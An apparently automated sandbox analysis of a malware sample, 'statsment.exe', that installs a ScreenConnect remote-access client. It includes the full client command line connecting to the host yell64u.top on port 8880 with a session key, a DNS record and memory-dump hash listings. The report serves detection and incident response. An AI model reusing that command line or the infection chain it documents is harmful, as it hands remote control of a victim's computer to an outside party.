                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 13, 2024 03:13:07.704803944 CET1.1.1.1192.168.2.40xd719No error (0)yell64u.top85.239.34.190A (IP address)IN (0x0001)false

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:21:12:59
                                                                    Start date:12/12/2024
                                                                    Path:C:\Users\user\Desktop\statsment.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\statsment.exe"
                                                                    Imagebase:0x240000
                                                                    File size:5'652'448 bytes
                                                                    MD5 hash:321132051C3ADD66F0CDAE4B8CF4C332
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1698483119.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:21:13:00
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff79d740000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                    Imagebase:0xc90000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:21:13:03
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:21:13:04
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:21:13:04
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c="
                                                                    Imagebase:0x410000
                                                                    File size:95'520 bytes
                                                                    MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 3%, Virustotal, Browse
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:21:13:06
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User"
                                                                    Imagebase:0xad0000
                                                                    File size:601'376 bytes
                                                                    MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:21:13:09
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System"
                                                                    Imagebase:0x6e0000
                                                                    File size:601'376 bytes
                                                                    MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                    Reset < >
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938
                                                                      • Opcode ID: e36d0c781ce20ec2177e5c5d85805329457abea53d8c14b1a386fd556e1a72bb
                                                                      • Instruction ID: f307173d39720a77094c1de3a404717f97bf66f584e8a81984e442ab5c58b224
                                                                      • Opcode Fuzzy Hash: e36d0c781ce20ec2177e5c5d85805329457abea53d8c14b1a386fd556e1a72bb
                                                                      • Instruction Fuzzy Hash: 9962B170A006158FCB18DF69C894AAEBBF2FF84310F548669E855DB791DB70EC46CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 451c77851118aa4bede7211c67e2aad23918e2ed6a9ecf2182464c2af57c584d
                                                                      • Instruction ID: b232c2353b005f916ff576eb1e12e9aa24ccfa3aefb0241fb7e9984ebb86cc1c
                                                                      • Opcode Fuzzy Hash: 451c77851118aa4bede7211c67e2aad23918e2ed6a9ecf2182464c2af57c584d
                                                                      • Instruction Fuzzy Hash: 1E525D38A00329CFDB15DF24D98469DBBB6FF89300F5085A9E909AB354CB71AD85CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: d9cce62c0d2f978b4939b6ab1df89471aab8085a5478536237a43e9507edd663
                                                                      • Instruction ID: 6077a04760b29febe825b15449af8db83345a763027f4f3f8d433550a3015c9b
                                                                      • Opcode Fuzzy Hash: d9cce62c0d2f978b4939b6ab1df89471aab8085a5478536237a43e9507edd663
                                                                      • Instruction Fuzzy Hash: 94425D38A00228CFDB19DF24D98479DBBB6FF89304F508599E909AB354CB71AD95CF84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afdbdb6e88184a6523e39ab70bd7bdb74d229645fa5252affb03ddf54766cc9d
                                                                      • Instruction ID: 7a536d36cfccc1701e9b4b764bf81c8f39039d19e04a6b4612311bfb92e1f8dd
                                                                      • Opcode Fuzzy Hash: afdbdb6e88184a6523e39ab70bd7bdb74d229645fa5252affb03ddf54766cc9d
                                                                      • Instruction Fuzzy Hash: FE026235A00229DFCB14DFA9C885AEDB7B2FF88310F95816AE819A7365DB319C45CF50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-2464098231
                                                                      • Opcode ID: c4ed65c71cc76d1b04978a54622fb679141849a3d92d425cc9bd86ad4a699efe
                                                                      • Instruction ID: b78e29f0efb5ef680201ca135a45ecc4453ad185dfa283e13d094375b128c4ac
                                                                      • Opcode Fuzzy Hash: c4ed65c71cc76d1b04978a54622fb679141849a3d92d425cc9bd86ad4a699efe
                                                                      • Instruction Fuzzy Hash: 3F610631B002358BCB29DF6998546BEBBB7FFC8620B60846BD4469B345DF319852C7A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$d/dq$vBvq
                                                                      • API String ID: 0-843820441
                                                                      • Opcode ID: d3efe076541b16623948dc663dd22993ec39a703eca823383ba4feceec4594a5
                                                                      • Instruction ID: a5526fd730b32ca58e1126c0668f5feb678464a6bf98ec738706ec278f804f3e
                                                                      • Opcode Fuzzy Hash: d3efe076541b16623948dc663dd22993ec39a703eca823383ba4feceec4594a5
                                                                      • Instruction Fuzzy Hash: 8C318070B002299FEB189FA9D5507AEB6B7FF88300F60453DE405A73D4CE758D418B54
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C8${/
                                                                      • API String ID: 0-4231431693
                                                                      • Opcode ID: 382f935f26b8866b0b4450845d2462290fd745399e75edbb0b5334a57faa9131
                                                                      • Instruction ID: 4598cb76e5805c5cd155933b4b045afee1e06135b861e3a8e8bbaad8f288996b
                                                                      • Opcode Fuzzy Hash: 382f935f26b8866b0b4450845d2462290fd745399e75edbb0b5334a57faa9131
                                                                      • Instruction Fuzzy Hash: 3251C0753502015FC705AB7EEA94B6E7BE6FBC92147508228E16ACB748EF70EC5687C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$Hbq
                                                                      • API String ID: 0-4081012451
                                                                      • Opcode ID: bd67cbb86d09c80f10f679f076c7a670cd2eaf7af56e02574d82b575343afba5
                                                                      • Instruction ID: f2170ede94b51ebf3288e1f20a26f0505c063aa745c73fd27f6a181965673d2e
                                                                      • Opcode Fuzzy Hash: bd67cbb86d09c80f10f679f076c7a670cd2eaf7af56e02574d82b575343afba5
                                                                      • Instruction Fuzzy Hash: 0851E174B042498FCB44EFAEC4986AEBBE2FF94350B14846AE945CB385DF34DC0187A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: b5ec84a208d11a62416abfa39846667d2ecede1b95c41db3fe8642b482c49b53
                                                                      • Instruction ID: 164355b99e451afbf440ad2c99bda27eab5fc4827bb5c4ad9bf3ae66c3b96392
                                                                      • Opcode Fuzzy Hash: b5ec84a208d11a62416abfa39846667d2ecede1b95c41db3fe8642b482c49b53
                                                                      • Instruction Fuzzy Hash: 50818F70B002159FC704DF69C994AAEBBF6FF88710F158169E945EB3A5CB30AC05CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 94e70fa9743ef4a6c0b6151809cf8324a4e03515ef126c5abe5c6e0489f600d8
                                                                      • Instruction ID: b9647af8c6506f1e23ad30ad7f575732aee695fdb98dea0f7d3bc71c82013fc7
                                                                      • Opcode Fuzzy Hash: 94e70fa9743ef4a6c0b6151809cf8324a4e03515ef126c5abe5c6e0489f600d8
                                                                      • Instruction Fuzzy Hash: 7B715D74B002159FDB14DF69C984AAEB7F6FF88710F558169E945EB3A5CB30AC01CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq
                                                                      • API String ID: 0-149360118
                                                                      • Opcode ID: 17ba806d27d8c07cf1fd314c6aa376c56d053c1f92fe512e5adc23abf5329fde
                                                                      • Instruction ID: 037c0a1208bbea5c73ce08b1cf68e813c168004271b61965ffcda11e5222b963
                                                                      • Opcode Fuzzy Hash: 17ba806d27d8c07cf1fd314c6aa376c56d053c1f92fe512e5adc23abf5329fde
                                                                      • Instruction Fuzzy Hash: EB612538B106159FDB14CF69D8989AEB7F2FF8D304B1481A9E546AB365DB30EC01CB80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: ef3217c3a6f3dc7398553f234aed3f917648ba5abf8e90ced620e43c7a8ecd56
                                                                      • Instruction ID: ff6a938ac6335fe79278f45ebb6eef56dcd9b38caf4f9f9f79cb543292081f20
                                                                      • Opcode Fuzzy Hash: ef3217c3a6f3dc7398553f234aed3f917648ba5abf8e90ced620e43c7a8ecd56
                                                                      • Instruction Fuzzy Hash: 3151F030B002219FCB249F64D8587AFBBF2BF84704F14896AE44ADB395DB399C41CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: kim^
                                                                      • API String ID: 0-4159165388
                                                                      • Opcode ID: 50e674ea59b8f6ae823e1693e81a9937a0e2c9b586f9050811769be4a6b9c0a6
                                                                      • Instruction ID: 900375b524aa6fa1a285e4ea51852938358f1ecec040008788fd1908baa94000
                                                                      • Opcode Fuzzy Hash: 50e674ea59b8f6ae823e1693e81a9937a0e2c9b586f9050811769be4a6b9c0a6
                                                                      • Instruction Fuzzy Hash: E6513038B003158FCB14DFA9C9949AAB7F6FF8C300B64856AE505DB365EB74EC458B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: kim^
                                                                      • API String ID: 0-4159165388
                                                                      • Opcode ID: 34e2879ed527370ddcbf1bbacd2deaa19ca574509d5b2dd5dd340676fd0b2052
                                                                      • Instruction ID: 7b64cf81a2568061839cc2b1882f5f7544ab2976b82d101a3ff3d0c1c703db65
                                                                      • Opcode Fuzzy Hash: 34e2879ed527370ddcbf1bbacd2deaa19ca574509d5b2dd5dd340676fd0b2052
                                                                      • Instruction Fuzzy Hash: E2513F38B003158FCB14DF69C9949AABBF6FF8C300B64856AE505DB365EB74EC458B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K]
                                                                      • API String ID: 0-3798347547
                                                                      • Opcode ID: 984b45642857a6da32441eeea327a2fc9f587ff993022a19ac30dc24e58e1e19
                                                                      • Instruction ID: 089d010148a183bc9a1c4cd421f5349264ab8ad4784d33dcfbef46272bee75cd
                                                                      • Opcode Fuzzy Hash: 984b45642857a6da32441eeea327a2fc9f587ff993022a19ac30dc24e58e1e19
                                                                      • Instruction Fuzzy Hash: C5412276A442118FCB419F6ED8D539AFBE4EF81260B14C5B7E888CF356EA30C80587A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 5662ba22d11134ac549136b61c6e8ad424224043ecc599acf87fc596eac01603
                                                                      • Instruction ID: f0bc5130ed5bf44abbc4b8351bc595c2fe74e5bcb109b13bf6fbc26a06bc617d
                                                                      • Opcode Fuzzy Hash: 5662ba22d11134ac549136b61c6e8ad424224043ecc599acf87fc596eac01603
                                                                      • Instruction Fuzzy Hash: 8E416E75B00216CFCB04DF68D9859AEBBF6FF88304B508629E505DB365DB30ED058B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s+
                                                                      • API String ID: 0-1285507049
                                                                      • Opcode ID: 2104a6c2ee8b3d3471cd8b414bf9aff5a4c91d8661f36c53c4e5b3e0adfe4c24
                                                                      • Instruction ID: 883b7dc290592849c059cefab2d5eb93da36b4202a9e800bbfac3560d13b41cf
                                                                      • Opcode Fuzzy Hash: 2104a6c2ee8b3d3471cd8b414bf9aff5a4c91d8661f36c53c4e5b3e0adfe4c24
                                                                      • Instruction Fuzzy Hash: 9741C731A002259FDF15DF64D4905EEBBB2FF84300F54856AE90AEB355DB70AD4ACB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s+
                                                                      • API String ID: 0-1285507049
                                                                      • Opcode ID: 54d340f02d186c456b7273396dcc10239da4f9ed9d5a15277296f56c1391286d
                                                                      • Instruction ID: 78ef75bb8f1f50526f03fe1c217d0b633ccc5402d1229595a07d0d9113a5f8d8
                                                                      • Opcode Fuzzy Hash: 54d340f02d186c456b7273396dcc10239da4f9ed9d5a15277296f56c1391286d
                                                                      • Instruction Fuzzy Hash: 7E41D331A002259FDF15DF64C4906EEBBB2FF85300F548569E90AEB345DB30AD4ACB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq
                                                                      • API String ID: 0-1245868
                                                                      • Opcode ID: f1d262eb5c3258ee0d8df7e6c0d13c88a674668b757c122ecbf22942991a10c0
                                                                      • Instruction ID: 5490e1d7e7bd010d64fcd267f5402f92d37f806982b3d72db2b2928e07b5a9ff
                                                                      • Opcode Fuzzy Hash: f1d262eb5c3258ee0d8df7e6c0d13c88a674668b757c122ecbf22942991a10c0
                                                                      • Instruction Fuzzy Hash: D741A271E107099FCB05EFB8C8059EFBFB5FF86210B01866AE545AB220EF309595CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 1c2a37082d54e4afb469c60b3922c9f1be75144e968e2e7003f27bf6619b0629
                                                                      • Instruction ID: 4566fd0da0e71779d179ca474eb783ef3ab6415ae7f68c62e1bf1a4d9a4f2e74
                                                                      • Opcode Fuzzy Hash: 1c2a37082d54e4afb469c60b3922c9f1be75144e968e2e7003f27bf6619b0629
                                                                      • Instruction Fuzzy Hash: A6314D70600B018FC734DF6AD988A5AB7F1FB88320B104B6DE0A6877A4D730E949CBD1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: d78d662011bc00d0a97d84801db7e54fbe9eb4b6817d1e072724dadd70ea816b
                                                                      • Instruction ID: a0f184e1ce9a11c16b88c324ba377dd3f506db7e9fd3fb51e6132a70611e067a
                                                                      • Opcode Fuzzy Hash: d78d662011bc00d0a97d84801db7e54fbe9eb4b6817d1e072724dadd70ea816b
                                                                      • Instruction Fuzzy Hash: BE21E5712007114FD725EB28D9946AEBBE6FF84314B405B3CD086CB799EF71B84A8B94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 031ff380dd7122ed63f6f02c4a33dd8fa835004ca5425b44a8a5c4b598bd7da5
                                                                      • Instruction ID: fab8fd7f5ee50210bb88196a4e5f2576119398bef07e1513fe622756804977d9
                                                                      • Opcode Fuzzy Hash: 031ff380dd7122ed63f6f02c4a33dd8fa835004ca5425b44a8a5c4b598bd7da5
                                                                      • Instruction Fuzzy Hash: 9421B934B10216AFDB189F60D895BAEBB76FF84700F548559F002AB2A4DFB15841DB40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 524918ed7380eda5c48d3463b08ebcb298e44b3ca65daad522deaacb6e0eff13
                                                                      • Instruction ID: 4d623ea02447f957cc9530ff6f5af147faf03bdb753344a8494d158d2807be97
                                                                      • Opcode Fuzzy Hash: 524918ed7380eda5c48d3463b08ebcb298e44b3ca65daad522deaacb6e0eff13
                                                                      • Instruction Fuzzy Hash: 7321AF712007114FD724EB29D9946AEBBE6FB84314B405B3CD08ACB799EF71B8498B94
                                                                      Strings
                                                                      Memory Dump Source
